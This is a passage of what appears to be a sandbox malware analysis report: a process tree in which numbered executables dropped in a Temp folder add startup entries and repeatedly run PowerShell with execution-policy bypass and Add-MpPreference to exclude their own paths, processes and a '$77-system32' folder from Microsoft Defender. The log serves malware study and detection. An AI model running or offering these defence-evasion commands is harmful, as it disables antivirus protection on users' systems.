                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                            PID:9776
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\22.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • Drops startup file
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:4832
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\22.exe'
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:5988
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '22.exe'
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:8216
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:10108
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:9684
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\21.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\21.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                              • Drops startup file
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:1192
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\21.exe'
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                PID:4460
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '21.exe'
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:6988
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:9384
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:8640
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\20.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\20.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:3352
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\20.exe'
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:3472
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '20.exe'
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:7340
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:9832
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:9936
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\19.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\19.exe"
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:1964
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\19.exe'
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  PID:6916
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '19.exe'
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:6192
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:9312
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:1176
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\18.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\18.exe"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    • Drops startup file
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:936
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\18.exe'
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:6096
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18.exe'
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                      PID:8976
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:6328
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:9596
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\17.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\17.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:4404
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\17.exe'
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:5536
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '17.exe'
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:7700
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:9564
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:9560
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\16.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\16.exe"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      • Drops startup file
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                      PID:4548
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\16.exe'
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        PID:7868
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '16.exe'
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                        PID:8764
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:4292
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:7288
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\15.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\15.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                          PID:1116
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\15.exe'
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                            PID:7828
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '15.exe'
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:7812
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              PID:7740
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:7556
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\14.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\14.exe"
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                              PID:2220
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\14.exe'
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                PID:7880
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '14.exe'
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                PID:304
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                PID:5064
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:6384
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\13.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\13.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:1500
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\13.exe'
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:7684
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '13.exe'
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  PID:7724
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  PID:8388
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  PID:9336
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\12.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\12.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                PID:2072
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\12.exe'
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:7800
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '12.exe'
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:8224
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:8652
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      PID:8776
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\11.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                    • Drops startup file
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:2424
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\11.exe'
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:6992
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '11.exe'
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      PID:8960
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      PID:6520
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      PID:7920
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                    • Drops startup file
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:2428
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10.exe'
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                      PID:7796
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '10.exe'
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:7656
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:8080
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:10188
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\9.exe"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:1308
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\9.exe'
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          PID:7036
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9.exe'
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:7824
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            PID:9348
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:8780
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\8.exe"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                            • Drops startup file
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:3348
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\8.exe'
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              PID:6952
